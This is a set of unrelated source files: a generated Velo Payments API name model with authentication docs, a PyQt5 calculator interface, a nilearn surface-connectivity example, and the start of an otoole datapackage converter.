# words_intersections = [ (author_name, other_author_name, ['word1', 'word2', 'word3', ...]), .... ]
        return compare, words_intersections
| 36.567857 | 108 | 0.514601 | [
"MIT"
] | moevm/nosql1h19-report-stats | src/database/reports_data_base.py | 10,239 | Python |
# coding: utf-8
"""
Velo Payments APIs
## Terms and Definitions Throughout this document and the Velo platform the following terms are used: * **Payor.** An entity (typically a corporation) which wishes to pay funds to one or more payees via a payout. * **Payee.** The recipient of funds paid out by a payor. * **Payment.** A single transfer of funds from a payor to a payee. * **Payout.** A batch of Payments, typically used by a payor to logically group payments (e.g. by business day). Technically there need be no relationship between the payments in a payout - a single payout can contain payments to multiple payees and/or multiple payments to a single payee. * **Sandbox.** An integration environment provided by Velo Payments which offers a similar API experience to the production environment, but all funding and payment events are simulated, along with many other services such as OFAC sanctions list checking. ## Overview The Velo Payments API allows a payor to perform a number of operations. The following is a list of the main capabilities in a natural order of execution: * Authenticate with the Velo platform * Maintain a collection of payees * Query the payor’s current balance of funds within the platform and perform additional funding * Issue payments to payees * Query the platform for a history of those payments This document describes the main concepts and APIs required to get up and running with the Velo Payments platform. It is not an exhaustive API reference. For that, please see the separate Velo Payments API Reference. ## API Considerations The Velo Payments API is REST based and uses the JSON format for requests and responses. Most calls are secured using OAuth 2 security and require a valid authentication access token for successful operation. See the Authentication section for details. Where a dynamic value is required in the examples below, the {token} format is used, suggesting that the caller needs to supply the appropriate value of the token in question (without including the { or } characters). Where curl examples are given, the –d @filename.json approach is used, indicating that the request body should be placed into a file named filename.json in the current directory. Each of the curl examples in this document should be considered a single line on the command-line, regardless of how they appear in print. ## Authenticating with the Velo Platform Once Velo backoffice staff have added your organization as a payor within the Velo platform sandbox, they will create you a payor Id, an API key and an API secret and share these with you in a secure manner. You will need to use these values to authenticate with the Velo platform in order to gain access to the APIs. The steps to take are explained in the following: create a string comprising the API key (e.g. 44a9537d-d55d-4b47-8082-14061c2bcdd8) and API secret (e.g. c396b26b-137a-44fd-87f5-34631f8fd529) with a colon between them. E.g. 44a9537d-d55d-4b47-8082-14061c2bcdd8:c396b26b-137a-44fd-87f5-34631f8fd529 base64 encode this string. E.g.: NDRhOTUzN2QtZDU1ZC00YjQ3LTgwODItMTQwNjFjMmJjZGQ4OmMzOTZiMjZiLTEzN2EtNDRmZC04N2Y1LTM0NjMxZjhmZDUyOQ== create an HTTP **Authorization** header with the value set to e.g. Basic NDRhOTUzN2QtZDU1ZC00YjQ3LTgwODItMTQwNjFjMmJjZGQ4OmMzOTZiMjZiLTEzN2EtNDRmZC04N2Y1LTM0NjMxZjhmZDUyOQ== perform the Velo authentication REST call using the HTTP header created above e.g. 
via curl: ``` curl -X POST \\ -H \"Content-Type: application/json\" \\ -H \"Authorization: Basic NDRhOTUzN2QtZDU1ZC00YjQ3LTgwODItMTQwNjFjMmJjZGQ4OmMzOTZiMjZiLTEzN2EtNDRmZC04N2Y1LTM0NjMxZjhmZDUyOQ==\" \\ 'https://api.sandbox.velopayments.com/v1/authenticate?grant_type=client_credentials' ``` If successful, this call will result in a **200** HTTP status code and a response body such as: ``` { \"access_token\":\"19f6bafd-93fd-4747-b229-00507bbc991f\", \"token_type\":\"bearer\", \"expires_in\":1799, \"scope\":\"...\" } ``` ## API access following authentication Following successful authentication, the value of the access_token field in the response (indicated in green above) should then be presented with all subsequent API calls to allow the Velo platform to validate that the caller is authenticated. This is achieved by setting the HTTP Authorization header with the value set to e.g. Bearer 19f6bafd-93fd-4747-b229-00507bbc991f such as the curl example below: ``` -H \"Authorization: Bearer 19f6bafd-93fd-4747-b229-00507bbc991f \" ``` If you make other Velo API calls which require authorization but the Authorization header is missing or invalid then you will get a **401** HTTP status response. # noqa: E501
The version of the OpenAPI document: 2.26.124
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
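# ---------------------------------------------------------------------------
# Illustrative sketch only (not part of the generated model): the
# client-credentials authentication flow described in the module docstring
# above. It assumes the third-party ``requests`` package is available; the
# api_key/api_secret arguments are placeholders supplied by the caller.
# ---------------------------------------------------------------------------
def _example_authenticate(api_key, api_secret):
    import base64
    import requests  # assumed dependency, used for this sketch only
    # "key:secret", base64-encoded, becomes the Basic Authorization header.
    credentials = base64.b64encode(
        '{}:{}'.format(api_key, api_secret).encode('utf-8')).decode('ascii')
    response = requests.post(
        'https://api.sandbox.velopayments.com/v1/authenticate'
        '?grant_type=client_credentials',
        headers={'Authorization': 'Basic ' + credentials})
    # The response body documented above carries the bearer token to use on
    # subsequent API calls.
    return response.json()['access_token']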
class Name2(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'title': 'str',
'first_name': 'str',
'other_names': 'str',
'last_name': 'str'
}
attribute_map = {
'title': 'title',
'first_name': 'firstName',
'other_names': 'otherNames',
'last_name': 'lastName'
}
def __init__(self, title=None, first_name=None, other_names=None, last_name=None): # noqa: E501
"""Name2 - a model defined in OpenAPI""" # noqa: E501
self._title = None
self._first_name = None
self._other_names = None
self._last_name = None
self.discriminator = None
if title is not None:
self.title = title
if first_name is not None:
self.first_name = first_name
if other_names is not None:
self.other_names = other_names
if last_name is not None:
self.last_name = last_name
@property
def title(self):
"""Gets the title of this Name2. # noqa: E501
:return: The title of this Name2. # noqa: E501
:rtype: str
"""
return self._title
@title.setter
def title(self, title):
"""Sets the title of this Name2.
:param title: The title of this Name2. # noqa: E501
:type: str
"""
if title is not None and len(title) > 10:
raise ValueError("Invalid value for `title`, length must be less than or equal to `10`") # noqa: E501
if title is not None and len(title) < 1:
raise ValueError("Invalid value for `title`, length must be greater than or equal to `1`") # noqa: E501
self._title = title
@property
def first_name(self):
"""Gets the first_name of this Name2. # noqa: E501
:return: The first_name of this Name2. # noqa: E501
:rtype: str
"""
return self._first_name
@first_name.setter
def first_name(self, first_name):
"""Sets the first_name of this Name2.
:param first_name: The first_name of this Name2. # noqa: E501
:type: str
"""
if first_name is not None and len(first_name) > 40:
raise ValueError("Invalid value for `first_name`, length must be less than or equal to `40`") # noqa: E501
if first_name is not None and len(first_name) < 1:
raise ValueError("Invalid value for `first_name`, length must be greater than or equal to `1`") # noqa: E501
self._first_name = first_name
@property
def other_names(self):
"""Gets the other_names of this Name2. # noqa: E501
:return: The other_names of this Name2. # noqa: E501
:rtype: str
"""
return self._other_names
@other_names.setter
def other_names(self, other_names):
"""Sets the other_names of this Name2.
:param other_names: The other_names of this Name2. # noqa: E501
:type: str
"""
if other_names is not None and len(other_names) > 40:
raise ValueError("Invalid value for `other_names`, length must be less than or equal to `40`") # noqa: E501
if other_names is not None and len(other_names) < 1:
raise ValueError("Invalid value for `other_names`, length must be greater than or equal to `1`") # noqa: E501
self._other_names = other_names
@property
def last_name(self):
"""Gets the last_name of this Name2. # noqa: E501
:return: The last_name of this Name2. # noqa: E501
:rtype: str
"""
return self._last_name
@last_name.setter
def last_name(self, last_name):
"""Sets the last_name of this Name2.
:param last_name: The last_name of this Name2. # noqa: E501
:type: str
"""
if last_name is not None and len(last_name) > 40:
raise ValueError("Invalid value for `last_name`, length must be less than or equal to `40`") # noqa: E501
if last_name is not None and len(last_name) < 1:
raise ValueError("Invalid value for `last_name`, length must be greater than or equal to `1`") # noqa: E501
self._last_name = last_name
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Name2):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
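# Illustrative usage sketch (not part of the generated code): construct the
# model, serialise it, and show that the property setters enforce the length
# limits declared above.
if __name__ == '__main__':
    example = Name2(title='Mr', first_name='Jane', last_name='Doe')
    print(example.to_dict())
    try:
        example.title = 'x' * 20  # exceeds the 10 character maximum
    except ValueError as err:
        print(err)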
| 52.376812 | 4,651 | 0.666021 | [
"Apache-2.0"
] | velopaymentsapi/velo-python | velo_payments/models/name2.py | 10,846 | Python |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'calculator2.ui'
#
# Created by: PyQt5 UI code generator 5.15.3
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.setEnabled(True)
MainWindow.setFixedSize(QtCore.QSize(471, 400))
MainWindow.setTabletTracking(False)
MainWindow.setDockNestingEnabled(False)
MainWindow.setUnifiedTitleAndToolBarOnMac(False)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setMinimumSize(QtCore.QSize(471, 390))
self.centralwidget.setMaximumSize(QtCore.QSize(471, 390))
self.centralwidget.setObjectName("centralwidget")
self.lcdNumber = QtWidgets.QLCDNumber(self.centralwidget)
self.lcdNumber.setGeometry(QtCore.QRect(10, 40, 451, 101))
self.lcdNumber.setStyleSheet("background-color: rgb(255, 255, 255);")
self.lcdNumber.setFrameShape(QtWidgets.QFrame.Box)
self.lcdNumber.setSmallDecimalPoint(False)
self.lcdNumber.setDigitCount(14)
self.lcdNumber.setSegmentStyle(QtWidgets.QLCDNumber.Flat)
self.lcdNumber.setObjectName("lcdNumber")
self.num_1 = QtWidgets.QPushButton(self.centralwidget)
self.num_1.setGeometry(QtCore.QRect(10, 290, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_1.setFont(font)
self.num_1.setStyleSheet(
"background-color: rgb(71, 64, 64);\n"
"color: rgb(255, 255, 255);")
self.num_1.setObjectName("num_1")
self.buttonGroup = QtWidgets.QButtonGroup(MainWindow)
self.buttonGroup.setObjectName("buttonGroup")
self.buttonGroup.addButton(self.num_1)
self.num_2 = QtWidgets.QPushButton(self.centralwidget)
self.num_2.setGeometry(QtCore.QRect(100, 290, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_2.setFont(font)
self.num_2.setStyleSheet(
"background-color: rgb(71, 64, 64);\n"
"color: rgb(255, 255, 255);")
self.num_2.setObjectName("num_2")
self.buttonGroup.addButton(self.num_2)
self.num_3 = QtWidgets.QPushButton(self.centralwidget)
self.num_3.setGeometry(QtCore.QRect(190, 290, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_3.setFont(font)
self.num_3.setStyleSheet(
"background-color: rgb(71, 64, 64);\n"
"color: rgb(255, 255, 255);")
self.num_3.setObjectName("num_3")
self.buttonGroup.addButton(self.num_3)
self.num_plus = QtWidgets.QPushButton(self.centralwidget)
self.num_plus.setGeometry(QtCore.QRect(280, 190, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_plus.setFont(font)
self.num_plus.setStyleSheet(
"background-color: rgb(255, 85, 0);\n"
"color: rgb(255, 255, 255);")
self.num_plus.setObjectName("num_plus")
self.num_4 = QtWidgets.QPushButton(self.centralwidget)
self.num_4.setGeometry(QtCore.QRect(10, 240, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_4.setFont(font)
self.num_4.setStyleSheet(
"background-color: rgb(71, 64, 64);\n"
"color: rgb(255, 255, 255);")
self.num_4.setObjectName("num_4")
self.buttonGroup.addButton(self.num_4)
self.num_5 = QtWidgets.QPushButton(self.centralwidget)
self.num_5.setGeometry(QtCore.QRect(100, 240, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_5.setFont(font)
self.num_5.setStyleSheet(
"background-color: rgb(71, 64, 64);\n"
"color: rgb(255, 255, 255);")
self.num_5.setObjectName("num_5")
self.buttonGroup.addButton(self.num_5)
self.num_6 = QtWidgets.QPushButton(self.centralwidget)
self.num_6.setGeometry(QtCore.QRect(190, 240, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_6.setFont(font)
self.num_6.setStyleSheet(
"background-color: rgb(71, 64, 64);\n"
"color: rgb(255, 255, 255);")
self.num_6.setObjectName("num_6")
self.buttonGroup.addButton(self.num_6)
self.num_minus = QtWidgets.QPushButton(self.centralwidget)
self.num_minus.setGeometry(QtCore.QRect(280, 240, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_minus.setFont(font)
self.num_minus.setStyleSheet(
"background-color: rgb(255, 85, 0);\n"
"color: rgb(255, 255, 255);")
self.num_minus.setObjectName("num_minus")
self.num_7 = QtWidgets.QPushButton(self.centralwidget)
self.num_7.setGeometry(QtCore.QRect(10, 190, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_7.setFont(font)
self.num_7.setStyleSheet(
"background-color: rgb(71, 64, 64);\n"
"color: rgb(255, 255, 255);")
self.num_7.setObjectName("num_7")
self.buttonGroup.addButton(self.num_7)
self.num_8 = QtWidgets.QPushButton(self.centralwidget)
self.num_8.setGeometry(QtCore.QRect(100, 190, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_8.setFont(font)
self.num_8.setStyleSheet(
"background-color: rgb(71, 64, 64);\n"
"color: rgb(255, 255, 255);")
self.num_8.setObjectName("num_8")
self.buttonGroup.addButton(self.num_8)
self.num_9 = QtWidgets.QPushButton(self.centralwidget)
self.num_9.setGeometry(QtCore.QRect(190, 190, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_9.setFont(font)
self.num_9.setStyleSheet(
"background-color: rgb(71, 64, 64);\n"
"color: rgb(255, 255, 255);")
self.num_9.setObjectName("num_9")
self.buttonGroup.addButton(self.num_9)
self.num_mult = QtWidgets.QPushButton(self.centralwidget)
self.num_mult.setGeometry(QtCore.QRect(280, 290, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_mult.setFont(font)
self.num_mult.setStyleSheet(
"background-color: rgb(255, 85, 0);\n"
"color: rgb(255, 255, 255);")
self.num_mult.setObjectName("num_mult")
self.num_point = QtWidgets.QPushButton(self.centralwidget)
self.num_point.setGeometry(QtCore.QRect(10, 340, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_point.setFont(font)
self.num_point.setStyleSheet(
"background-color: rgb(71, 64, 64);\n"
"color: rgb(255, 255, 255);")
self.num_point.setObjectName("num_point")
self.buttonGroup.addButton(self.num_point)
self.num_0 = QtWidgets.QPushButton(self.centralwidget)
self.num_0.setGeometry(QtCore.QRect(100, 340, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_0.setFont(font)
self.num_0.setStyleSheet(
"background-color: rgb(71, 64, 64);\n"
"color: rgb(255, 255, 255);")
self.num_0.setObjectName("num_0")
self.buttonGroup.addButton(self.num_0)
self.num_eq = QtWidgets.QPushButton(self.centralwidget)
self.num_eq.setGeometry(QtCore.QRect(370, 340, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_eq.setFont(font)
self.num_eq.setStyleSheet(
"background-color: rgb(170, 0, 0);\n"
"color: rgb(255, 255, 255);")
self.num_eq.setObjectName("num_eq")
self.num_division = QtWidgets.QPushButton(self.centralwidget)
self.num_division.setGeometry(QtCore.QRect(280, 340, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_division.setFont(font)
self.num_division.setStyleSheet(
"background-color: rgb(255, 85, 0);\n"
"color: rgb(255, 255, 255);")
self.num_division.setObjectName("num_division")
self.num_c = QtWidgets.QPushButton(self.centralwidget)
self.num_c.setGeometry(QtCore.QRect(370, 150, 91, 41))
font = QtGui.QFont()
font.setPointSize(20)
self.num_c.setFont(font)
self.num_c.setStyleSheet(
"background-color: rgb(255, 170, 0);\n"
"color: rgb(255, 255, 255);")
self.num_c.setObjectName("num_c")
self.num_ce = QtWidgets.QPushButton(self.centralwidget)
self.num_ce.setGeometry(QtCore.QRect(280, 150, 91, 41))
font = QtGui.QFont()
font.setPointSize(20)
self.num_ce.setFont(font)
self.num_ce.setStyleSheet(
"background-color: rgb(255, 170, 0);\n"
"color: rgb(255, 255, 255);")
self.num_ce.setShortcut("")
self.num_ce.setAutoDefault(False)
self.num_ce.setDefault(False)
self.num_ce.setFlat(False)
self.num_ce.setObjectName("num_ce")
self.num_backspace = QtWidgets.QPushButton(self.centralwidget)
self.num_backspace.setGeometry(QtCore.QRect(370, 190, 91, 51))
font = QtGui.QFont()
font.setPointSize(30)
self.num_backspace.setFont(font)
self.num_backspace.setStyleSheet(
"background-color: rgb(255, 85, 0);\n"
"color: rgb(255, 255, 255);")
self.num_backspace.setObjectName("num_backspace")
self.num_procent = QtWidgets.QPushButton(self.centralwidget)
self.num_procent.setGeometry(QtCore.QRect(370, 290, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_procent.setFont(font)
self.num_procent.setStyleSheet(
"background-color: rgb(255, 85, 0);\n"
"color: rgb(255, 255, 255);")
self.num_procent.setObjectName("num_procent")
self.num_plus_minus = QtWidgets.QPushButton(self.centralwidget)
self.num_plus_minus.setGeometry(QtCore.QRect(190, 340, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_plus_minus.setFont(font)
self.num_plus_minus.setStyleSheet(
"background-color: rgb(71, 64, 64);\n"
"color: rgb(255, 255, 255);")
self.num_plus_minus.setObjectName("num_plus_minus")
self.buttonGroup.addButton(self.num_plus_minus)
self.history = QtWidgets.QLabel(self.centralwidget)
self.history.setGeometry(QtCore.QRect(10, 10, 451, 21))
font = QtGui.QFont()
font.setPointSize(12)
self.history.setFont(font)
self.history.setLayoutDirection(QtCore.Qt.LeftToRight)
self.history.setText("")
self.history.setAlignment(
QtCore.Qt.AlignRight |
QtCore.Qt.AlignTrailing |
QtCore.Qt.AlignVCenter)
self.history.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse)
self.history.setObjectName("history")
self.num_mc = QtWidgets.QPushButton(self.centralwidget)
self.num_mc.setGeometry(QtCore.QRect(10, 150, 68, 41))
font = QtGui.QFont()
font.setPointSize(20)
self.num_mc.setFont(font)
self.num_mc.setStyleSheet(
"background-color: rgb(193, 193, 193);"
"color: rgb(255, 255, 255);\n")
self.num_mc.setObjectName("num_mc")
self.num_mr = QtWidgets.QPushButton(self.centralwidget)
self.num_mr.setGeometry(QtCore.QRect(77, 150, 68, 41))
font = QtGui.QFont()
font.setPointSize(20)
self.num_mr.setFont(font)
self.num_mr.setStyleSheet(
"background-color: rgb(193, 193, 193);"
"color: rgb(255, 255, 255);\n")
self.num_mr.setObjectName("num_mr")
self.num_m_minus = QtWidgets.QPushButton(self.centralwidget)
self.num_m_minus.setGeometry(QtCore.QRect(144, 150, 68, 41))
font = QtGui.QFont()
font.setPointSize(20)
self.num_m_minus.setFont(font)
self.num_m_minus.setStyleSheet(
"background-color: rgb(193, 193, 193);"
"color: rgb(255, 255, 255);\n")
self.num_m_minus.setObjectName("num_m_minus")
self.num_sqrt = QtWidgets.QPushButton(self.centralwidget)
self.num_sqrt.setGeometry(QtCore.QRect(370, 240, 91, 51))
font = QtGui.QFont()
font.setFamily("MS Shell Dlg 2")
font.setPointSize(20)
font.setBold(False)
font.setWeight(50)
self.num_sqrt.setFont(font)
self.num_sqrt.setStyleSheet(
"background-color: rgb(255, 85, 0);\n"
"color: rgb(255, 255, 255);")
self.num_sqrt.setObjectName("num_sqrt")
self.num_m_plus = QtWidgets.QPushButton(self.centralwidget)
self.num_m_plus.setGeometry(QtCore.QRect(211, 150, 70, 41))
font = QtGui.QFont()
font.setPointSize(20)
self.num_m_plus.setFont(font)
self.num_m_plus.setStyleSheet(
"background-color: rgb(193, 193, 193);"
"color: rgb(255, 255, 255);\n")
self.num_m_plus.setObjectName("num_m_plus")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(15, 43, 20, 20))
font = QtGui.QFont()
font.setPointSize(20)
self.label.setFont(font)
self.label.setObjectName("label")
self.lcdNumber.raise_()
self.history.raise_()
self.num_mc.raise_()
self.num_mr.raise_()
self.num_m_minus.raise_()
self.num_m_plus.raise_()
self.num_ce.raise_()
self.num_c.raise_()
self.num_7.raise_()
self.num_8.raise_()
self.num_9.raise_()
self.num_plus.raise_()
self.num_backspace.raise_()
self.num_4.raise_()
self.num_5.raise_()
self.num_6.raise_()
self.num_1.raise_()
self.num_2.raise_()
self.num_3.raise_()
self.num_point.raise_()
self.num_0.raise_()
self.num_minus.raise_()
self.num_mult.raise_()
self.num_plus_minus.raise_()
self.num_division.raise_()
self.label.raise_()
self.num_sqrt.raise_()
self.num_procent.raise_()
self.num_eq.raise_()
MainWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Калькулятор v1.1"))
self.num_1.setText(_translate("MainWindow", "1"))
self.num_2.setText(_translate("MainWindow", "2"))
self.num_3.setText(_translate("MainWindow", "3"))
self.num_plus.setText(_translate("MainWindow", "+"))
self.num_4.setText(_translate("MainWindow", "4"))
self.num_5.setText(_translate("MainWindow", "5"))
self.num_6.setText(_translate("MainWindow", "6"))
self.num_minus.setText(_translate("MainWindow", "-"))
self.num_7.setText(_translate("MainWindow", "7"))
self.num_8.setText(_translate("MainWindow", "8"))
self.num_9.setText(_translate("MainWindow", "9"))
self.num_mult.setText(_translate("MainWindow", "*"))
self.num_point.setText(_translate("MainWindow", "."))
self.num_0.setText(_translate("MainWindow", "0"))
self.num_eq.setText(_translate("MainWindow", "="))
self.num_division.setText(_translate("MainWindow", "÷"))
self.num_c.setText(_translate("MainWindow", "C"))
self.num_ce.setText(_translate("MainWindow", "CE"))
self.num_backspace.setText(_translate("MainWindow", "←"))
self.num_procent.setText(_translate("MainWindow", "%"))
self.num_plus_minus.setText(_translate("MainWindow", "+/-"))
self.num_mc.setText(_translate("MainWindow", "MC"))
self.num_mr.setText(_translate("MainWindow", "MR"))
self.num_m_minus.setText(_translate("MainWindow", "M-"))
self.num_sqrt.setText(_translate("MainWindow", "√"))
self.num_m_plus.setText(_translate("MainWindow", "M+"))
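# Illustrative launch sketch (not produced by pyuic5): the usual way a
# generated Ui class like this one is attached to a main window.
if __name__ == "__main__":
    import sys
    app = QtWidgets.QApplication(sys.argv)
    window = QtWidgets.QMainWindow()
    ui = Ui_MainWindow()
    ui.setupUi(window)
    window.show()
    sys.exit(app.exec_())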
| 45.326203 | 80 | 0.616505 | [
"MIT"
] | Eqwe-Wewe/accounting-calc | gui_calculator.py | 16,968 | Python |
"""
Seed-based connectivity on the surface
=======================================
The dataset that is a subset of the enhanced NKI Rockland sample
(http://fcon_1000.projects.nitrc.org/indi/enhanced/, Nooner et al, 2012)
Resting state fMRI scans (TR=645ms) of 102 subjects were preprocessed
(https://github.com/fliem/nki_nilearn) and projected onto the Freesurfer
fsaverage5 template (Dale et al, 1999, Fischl et al, 1999). For this example
we use the time series of a single subject's left hemisphere.
The Destrieux parcellation (Destrieux et al, 2010) in fsaverage5 space as
distributed with Freesurfer is used to select a seed region in the posterior
cingulate cortex.
Functional connectivity of the seed region to all other cortical nodes in the
same hemisphere is calculated using Pearson product-moment correlation
coefficient.
The :func:`nilearn.plotting.plot_surf_stat_map` function is used
to plot the resulting statistical map on the (inflated) pial surface.
See also :ref:`for a similar example but using volumetric input data
<sphx_glr_auto_examples_03_connectivity_plot_seed_to_voxel_correlation.py>`.
See :ref:`plotting` for more details on plotting tools.
NOTE: This example needs matplotlib version higher than 1.3.1.
References
----------
Nooner et al, (2012). The NKI-Rockland Sample: A model for accelerating the
pace of discovery science in psychiatry. Frontiers in neuroscience 6, 152.
URL http://dx.doi.org/10.3389/fnins.2012.00152
Dale et al, (1999). Cortical surface-based analysis. I. Segmentation and
surface reconstruction. Neuroimage 9.
URL http://dx.doi.org/10.1006/nimg.1998.0395
Fischl et al, (1999). Cortical surface-based analysis. II: Inflation,
flattening, and a surface-based coordinate system. Neuroimage 9.
http://dx.doi.org/10.1006/nimg.1998.0396
Destrieux et al, (2010). Automatic parcellation of human cortical gyri and
sulci using standard anatomical nomenclature. NeuroImage, 53, 1.
URL http://dx.doi.org/10.1016/j.neuroimage.2010.06.010.
"""
###############################################################################
# Retrieving the data
# -------------------
# NKI resting state data from nilearn
from nilearn import datasets
nki_dataset = datasets.fetch_surf_nki_enhanced(n_subjects=1)
# The nki dictionary contains file names for the data
# of all downloaded subjects.
print(('Resting state data of the first subject on the '
       'fsaverage5 surface left hemisphere is at: %s' %
nki_dataset['func_left'][0]))
# Destrieux parcellation for left hemisphere in fsaverage5 space
destrieux_atlas = datasets.fetch_atlas_surf_destrieux()
parcellation = destrieux_atlas['map_left']
labels = destrieux_atlas['labels']
# Fsaverage5 surface template
fsaverage = datasets.fetch_surf_fsaverage5()
# The fsaverage dataset contains file names pointing to
# the file locations
print('Fsaverage5 pial surface of left hemisphere is at: %s' %
fsaverage['pial_left'])
print('Fsaverage5 inflated surface of left hemisphere is at: %s' %
fsaverage['infl_left'])
print('Fsaverage5 sulcal depth map of left hemisphere is at: %s' %
fsaverage['sulc_left'])
###############################################################################
# Extracting the seed time series
# --------------------------------
# Load resting state time series from nilearn
from nilearn import surface
timeseries = surface.load_surf_data(nki_dataset['func_left'][0])
# Extract seed region via label
pcc_region = b'G_cingul-Post-dorsal'
import numpy as np
pcc_labels = np.where(parcellation == labels.index(pcc_region))[0]
# Extract time series from seed region
seed_timeseries = np.mean(timeseries[pcc_labels], axis=0)
###############################################################################
# Calculating seed-based functional connectivity
# ----------------------------------------------
# Calculate Pearson product-moment correlation coefficient between seed
# time series and timeseries of all cortical nodes of the hemisphere
from scipy import stats
stat_map = np.zeros(timeseries.shape[0])
for i in range(timeseries.shape[0]):
stat_map[i] = stats.pearsonr(seed_timeseries, timeseries[i])[0]
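# Note (illustrative alternative): the per-node loop above can be replaced by a
# single vectorised call, at the cost of computing the full correlation matrix:
#   stat_map = np.corrcoef(seed_timeseries, timeseries)[0, 1:]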
# Re-mask previously masked nodes (medial wall)
stat_map[np.where(np.mean(timeseries, axis=1) == 0)] = 0
###############################################################################
# Display ROI on surface
from nilearn import plotting
plotting.plot_surf_roi(fsaverage['pial_left'], roi_map=pcc_labels,
hemi='left', view='medial',
bg_map=fsaverage['sulc_left'], bg_on_data=True,
title='PCC Seed')
###############################################################################
# Display unthresholded stat map with dimmed background
plotting.plot_surf_stat_map(fsaverage['pial_left'], stat_map=stat_map,
hemi='left', view='medial',
bg_map=fsaverage['sulc_left'], bg_on_data=True,
darkness=.5, title='Correlation map')
###############################################################################
# Display unthresholded stat map without background map, transparency is
# automatically set to .5, but can also be controlled with the alpha parameter
plotting.plot_surf_stat_map(fsaverage['pial_left'], stat_map=stat_map,
hemi='left', view='medial',
title='Plotting without background')
###############################################################################
# Many different options are available for plotting, for example thresholding,
# or using custom colormaps
plotting.plot_surf_stat_map(fsaverage['pial_left'], stat_map=stat_map,
hemi='left', view='medial',
bg_map=fsaverage['sulc_left'], bg_on_data=True,
cmap='Spectral', threshold=.5,
title='Threshold and colormap')
###############################################################################
# The plots can be saved to file, in which case the display is closed after
# creating the figure
plotting.plot_surf_stat_map(fsaverage['infl_left'], stat_map=stat_map,
hemi='left', bg_map=fsaverage['sulc_left'],
bg_on_data=True, threshold=.6,
output_file='plot_surf_stat_map.png')
plotting.show()
| 40.791139 | 79 | 0.636618 | [
"BSD-2-Clause"
] | QinglinDong/nilearn-deep | examples/01_plotting/plot_surf_stat_map.py | 6,445 | Python |
import logging
import sys
from abc import abstractmethod
from typing import TextIO
import pandas as pd
from datapackage import Package
from pandas_datapackage_reader import read_datapackage
from sqlalchemy import create_engine
from otoole import read_packaged_file
logger = logging.getLogger(__name__)
class DataPackageTo(object):
"""Convert a data package to another format
Arguments
---------
datapackage: str
        The path to the datapackage
datafilepath: str
The path to the destination file or folder
sql: bool, default=False
Flag to set whether the source datapackage is in sqlite format
"""
def __init__(self, datapackage: str, datafilepath: str, sql: bool = False):
self.datapackage = datapackage
self.datafilepath = datafilepath
self.sql = sql
self.package = self._get_package()
self.default_values = self._get_default_values()
self.config = read_packaged_file("config.yaml", "otoole.preprocess")
def _get_package(self):
if self.sql:
engine = create_engine("sqlite:///{}".format(self.datapackage))
package = Package(storage="sql", engine=engine)
else:
package = read_datapackage(self.datapackage) # typing: datapackage.Package
return package
def _get_default_values(self):
default_resource = (
self.package.pop("default_values").set_index("name").to_dict()
)
return default_resource["default_value"]
def convert(self):
"""Perform the conversion from datapackage to destination format
"""
handle = self._header()
logger.debug(self.default_values)
for name, df in self.package.items():
logger.debug(name)
if df.empty:
columns = [x["name"] for x in df._metadata["schema"]["fields"]]
df = pd.DataFrame(columns=columns)
df = df.reset_index()
if "index" in df.columns:
df = df.drop(columns="index")
logger.debug("Number of columns: %s, %s", len(df.columns), df.columns)
if len(df.columns) > 1:
default_value = self.default_values[name]
self._write_parameter(df, name, handle, default=default_value)
else:
self._write_set(df, name, handle)
self._footer(handle)
handle.close()
@abstractmethod
def _header(self) -> TextIO:
raise NotImplementedError()
@abstractmethod
def _write_parameter(
